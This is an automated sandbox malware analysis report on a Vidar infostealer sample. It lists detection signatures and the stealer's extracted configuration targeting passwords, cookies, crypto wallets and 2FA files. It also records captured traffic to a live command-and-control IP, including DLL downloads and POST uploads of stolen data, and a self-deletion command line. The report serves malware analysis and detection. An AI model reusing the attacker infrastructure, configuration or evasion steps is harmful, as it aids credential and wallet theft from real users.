Play interactive tour

Edit tour

Windows Analysis Report 0lm81UZm7Y.exe

Overview

General Information

Sample Name:	0lm81UZm7Y.exe
Analysis ID:	490255
MD5:	14c81d7bc27bdb0d92cfff414f8ffd04
SHA1:	a1e4f8e3c26b95f96915a7258d9af11f5361d01c
SHA256:	4087eb3e978126b130b53e7477fbccec4c5502cf670594daea6176e4535169b3
Tags:	ArkeiStealerexe
Infos:
Most interesting Screenshot:

Detection

Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Detected unpacking (overwrites its own PE header)

Yara detected Vidar

Yara detected Vidar stealer

Detected unpacking (changes PE section rights)

Multi AV Scanner detection for domain / URL

Tries to steal Crypto Currency Wallets

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Machine Learning detection for sample

Self deletion via cmd delete

Found many strings related to Crypto-Wallets (likely being stolen)

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Antivirus or Machine Learning detection for unpacked file

Drops PE files to the application program directory (C:\ProgramData)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Yara detected Credential Stealer

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Downloads executable code via HTTP

Enables debug privileges

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Is looking for software installed on the system

Queries information about the installed CPU (vendor, model number etc)

Sample file is different than original file name gathered from version info

Extensive use of GetProcAddress (often used to hide API calls)

PE file contains strange resources

Drops PE files

Contains functionality to read the PEB

Uses taskkill to terminate processes

Uses Microsoft's Enhanced Cryptographic Provider

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

0lm81UZm7Y.exe (PID: 6636 cmdline: 'C:\Users\user\Desktop\0lm81UZm7Y.exe' MD5: 14C81D7BC27BDB0D92CFFF414F8FFD04)

cmd.exe (PID: 5616 cmdline: 'C:\Windows\System32\cmd.exe' /c taskkill /im 0lm81UZm7Y.exe /f & timeout /t 6 & del /f /q 'C:\Users\user\Desktop\0lm81UZm7Y.exe' & del C:\ProgramData\*.dll & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 4636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

taskkill.exe (PID: 6152 cmdline: taskkill /im 0lm81UZm7Y.exe /f MD5: 15E2E0ACD891510C6268CB8899F2A1A1)

timeout.exe (PID: 5420 cmdline: timeout /t 6 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)

cleanup

Malware Configuration

Threatname: Vidar

{"Saved Password": "1", "Cookies": "1", "Wallet": "1", "Internet History": "1", "Telegram": "1", "Screenshot": "1", "Grabber": "1", "Max Size": "250", "Search Path": "%DESKTOP%\\", "Extensions": ["*.txt", "*.dat", "*wallet*.*", "*2fa*.*", "*backup*.*", "*code*.*", "*password*.*", "*auth*.*", "*google*.*", "*utc*.*", "*UTC*.*", "*crypt*.*", "*key*.*"], "Max Filesize": "50", "Recusrive Search": "true", "Ignore Strings": "movies:music:mp3"}

Yara Overview

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Vidar_2	Yara detected Vidar	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000001.00000002.278147128.00000000006C4000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.278284873.00000000021A0000.00000040.00000001.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000001.00000003.247214194.00000000022C0000.00000004.00000001.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: 0lm81UZm7Y.exe PID: 6636	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author
1.2.0lm81UZm7Y.exe.21a0e50.1.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.3.0lm81UZm7Y.exe.22c0000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.2.0lm81UZm7Y.exe.400000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.2.0lm81UZm7Y.exe.400000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.2.0lm81UZm7Y.exe.21a0e50.1.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.3.0lm81UZm7Y.exe.22c0000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Click to see the 1 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: HTTP data

Malware Configuration Extractor: Vidar {"Saved Password": "1", "Cookies": "1", "Wallet": "1", "Internet History": "1", "Telegram": "1", "Screenshot": "1", "Grabber": "1", "Max Size": "250", "Search Path": "%DESKTOP%\\", "Extensions": ["*.txt", "*.dat", "*wallet*.*", "*2fa*.*", "*backup*.*", "*code*.*", "*password*.*", "*auth*.*", "*google*.*", "*utc*.*", "*UTC*.*", "*crypt*.*", "*key*.*"], "Max Filesize": "50", "Recusrive Search": "true", "Ignore Strings": "movies:music:mp3"}

Multi AV Scanner detection for submitted file

Show sources

Source: 0lm81UZm7Y.exe

Virustotal: Detection: 33%

Perma Link

Multi AV Scanner detection for domain / URL

Show sources

Source: http://159.69.203.58/mozglue.dll	Virustotal: Detection: 13%			Perma Link
Source: http://159.69.203.58/msvcp140.dll	Virustotal: Detection: 13%			Perma Link

Machine Learning detection for sample

Show sources

Source: 0lm81UZm7Y.exe

Joe Sandbox ML: detected

Source: 1.2.0lm81UZm7Y.exe.21a0e50.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 1.3.0lm81UZm7Y.exe.22c0000.0.unpack	Avira: Label: TR/Patched.Ren.Gen

Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	Code function: 1_2_00416200 CryptUnprotectData,LocalAlloc,_memmove,LocalFree,	1_2_00416200
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	Code function: 1_2_00416190 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	1_2_00416190
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	Code function: 1_2_00416340 _malloc,_memmove,_malloc,CryptUnprotectData,_memmove,	1_2_00416340

Compliance:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\0lm81UZm7Y.exe

Unpacked PE file: 1.2.0lm81UZm7Y.exe.400000.0.unpack

Source: 0lm81UZm7Y.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\0lm81UZm7Y.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 88.99.75.82:443 -> 192.168.2.5:49743 version: TLS 1.2

Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.1.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3[1].dll.1.dr
Source:	Binary string: vcruntime140.i386.pdb source: vcruntime140[1].dll.1.dr
Source:	Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140[1].dll.1.dr
Source:	Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.1.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: mozglue[1].dll.1.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.1.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: mozglue[1].dll.1.dr
Source:	Binary string: C:\dunabefadote.pdb source: 0lm81UZm7Y.exe
Source:	Binary string: msvcp140.i386.pdb source: msvcp140.dll.1.dr
Source:	Binary string: !Y^C:\dunabefadote.pdb source: 0lm81UZm7Y.exe
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss3.pdb source: nss3[1].dll.1.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3[1].dll.1.dr

Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	Code function: 1_2_0041B590 _sprintf,FindFirstFileA,_sprintf,FindNextFileA,FindClose,	1_2_0041B590
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	Code function: 1_2_00496670 FindFirstFileW,FindNextFileW,FindNextFileW,	1_2_00496670
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	Code function: 1_2_0041B810 __wgetenv,_sprintf,FindFirstFileA,_sprintf,_sprintf,_sprintf,PathMatchSpecA,CreateDirectoryA,CopyFileA,FindNextFileA,FindClose,	1_2_0041B810
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	Code function: 1_2_0040EB20 _sprintf,FindFirstFileA,_sprintf,_sprintf,_sprintf,PathMatchSpecA,CopyFileA,FindNextFileA,FindClose,	1_2_0040EB20
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	Code function: 1_2_00405D80 _memset,_memset,_memset,_memset,lstrcpyW,lstrcpyW,lstrcatW,lstrcatW,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,PathMatchSpecW,DeleteFileW,PathMatchSpecW,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileW,lstrcpyW,lstrcatW,_memset,_memset,_memset,_memset,FindClose,FindClose,_memset,_memset,_memset,_memset,	1_2_00405D80

Source: C:\Users\user\Desktop\0lm81UZm7Y.exe

Code function: 1_2_0040F150 _strtok,_strtok,_memmove,_memmove,__wgetenv,_memmove,__wgetenv,_memmove,_memmove,_memmove,_memmove,_memmove,GetLogicalDriveStringsA,_strtok,GetDriveTypeA,_strtok,

1_2_0040F150

Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\	Jump to behavior
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\	Jump to behavior

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET /@killern0 HTTP/1.1Host: mas.to
Source: global traffic	HTTP traffic detected: POST /1008 HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 159.69.203.58Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 159.69.203.58Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 159.69.203.58Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 159.69.203.58Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 159.69.203.58Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 159.69.203.58Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 159.69.203.58Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 97042Host: 159.69.203.58Connection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 88.99.75.82 88.99.75.82
Source: Joe Sandbox View	IP Address: 159.69.203.58 159.69.203.58

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sat, 25 Sep 2021 08:15:03 GMTContent-Type: application/x-msdos-programContent-Length: 334288Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "519d0-57aa1f0b0df80"Expires: Sun, 26 Sep 2021 08:15:03 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 f0 2f 05 84 91 41 56 84 91 41 56 84 91 41 56 8d e9 d2 56 88 91 41 56 5d f3 40 57 86 91 41 56 1a 31 86 56 85 91 41 56 5d f3 42 57 80 91 41 56 5d f3 44 57 8f 91 41 56 5d f3 45 57 8f 91 41 56 a6 f1 40 57 80 91 41 56 4f f2 40 57 87 91 41 56 84 91 40 56 d6 91 41 56 4f f2 42 57 86 91 41 56 4f f2 45 57 c0 91 41 56 4f f2 41 57 85 91 41 56 4f f2 be 56 85 91 41 56 4f f2 43 57 85 91 41 56 52 69 63 68 84 91 41 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d8 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 d8 03 00 00 66 01 00 00 00 00 00 29 dd 03 00 00 10 00 00 00 f0 03 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 05 00 00 04 00 00 a3 73 05 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 e6 04 00 50 00 00 00 c0 e6 04 00 c8 00 00 00 00 40 05 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fc 04 00 d0 1d 00 00 00 50 05 00 e0 16 00 00 30 e2 04 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 e2 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 d6 03 00 00 10 00 00 00 d8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fc fe 00 00 00 f0 03 00 00 00 01 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 48 00 00 00 f0 04 00 00 04 00 00 00 dc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 05 00 00 04 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e0 16 00 00 00 50 05 00 00 18 00 00 00 e4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sat, 25 Sep 2021 08:15:03 GMTContent-Type: application/x-msdos-programContent-Length: 137168Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "217d0-57aa1f0b0df80"Expires: Sun, 26 Sep 2021 08:15:03 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8d c2 55 b1 c9 a3 3b e2 c9 a3 3b e2 c9 a3 3b e2 c0 db a8 e2 d9 a3 3b e2 57 03 fc e2 cb a3 3b e2 10 c1 38 e3 c7 a3 3b e2 10 c1 3f e3 c2 a3 3b e2 10 c1 3a e3 cd a3 3b e2 10 c1 3e e3 db a3 3b e2 eb c3 3a e3 c0 a3 3b e2 c9 a3 3a e2 77 a3 3b e2 02 c0 3f e3 c8 a3 3b e2 02 c0 3e e3 dd a3 3b e2 02 c0 3b e3 c8 a3 3b e2 02 c0 c4 e2 c8 a3 3b e2 02 c0 39 e3 c8 a3 3b e2 52 69 63 68 c9 a3 3b e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 c4 5f eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 7a 01 00 00 86 00 00 00 00 00 00 e0 82 01 00 00 10 00 00 00 90 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 02 00 00 04 00 00 16 33 02 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 c0 01 00 74 1e 00 00 b4 de 01 00 2c 01 00 00 00 20 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fa 01 00 d0 1d 00 00 00 30 02 00 68 0c 00 00 00 b9 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 b9 01 00 18 00 00 00 68 b8 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 f4 02 00 00 6c be 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ca 78 01 00 00 10 00 00 00 7a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5e 65 00 00 00 90 01 00 00 66 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 0b 00 00 00 00 02 00 00 02 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 38 00 00 00 00 10 02 00 00 02 00 00 00 e6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 20 02 00 00 04 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0c 00 00 00 30 02 00 00 0e 00 00 00 ec 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sat, 25 Sep 2021 08:15:03 GMTContent-Type: application/x-msdos-programContent-Length: 440120Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "6b738-57aa1f0b0df80"Expires: Sun, 26 Sep 2021 08:15:03 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a6 c8 bc 41 e2 a9 d2 12 e2 a9 d2 12 e2 a9 d2 12 56 35 3d 12 e0 a9 d2 12 eb d1 41 12 fa a9 d2 12 3b cb d3 13 e1 a9 d2 12 e2 a9 d3 12 22 a9 d2 12 3b cb d1 13 eb a9 d2 12 3b cb d6 13 ee a9 d2 12 3b cb d7 13 f4 a9 d2 12 3b cb da 13 95 a9 d2 12 3b cb d2 13 e3 a9 d2 12 3b cb 2d 12 e3 a9 d2 12 3b cb d0 13 e3 a9 d2 12 52 69 63 68 e2 a9 d2 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 16 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 04 06 00 00 82 00 00 00 00 00 00 50 b1 03 00 00 10 00 00 00 20 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 61 7a 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 43 04 00 82 cf 01 00 f4 52 06 00 2c 01 00 00 00 80 06 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 78 06 00 38 3f 00 00 00 90 06 00 34 3a 00 00 f0 66 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 28 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 06 00 f0 02 00 00 98 40 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 03 06 00 00 10 00 00 00 04 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 10 28 00 00 00 20 06 00 00 18 00 00 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 36 14 00 00 00 50 06 00 00 16 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 70 06 00 00 02 00 00 00 36 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 03 00 00 00 80 06 00 00 04 00 00 00 38 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 3a 00 00 00 90 06 00 00 3c 00 00 00 3c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sat, 25 Sep 2021 08:15:03 GMTContent-Type: application/x-msdos-programContent-Length: 1246160Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "1303d0-57aa1f0b0df80"Expires: Sun, 26 Sep 2021 08:15:03 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 83 34 8c 67 e2 5a df 67 e2 5a df 67 e2 5a df 6e 9a c9 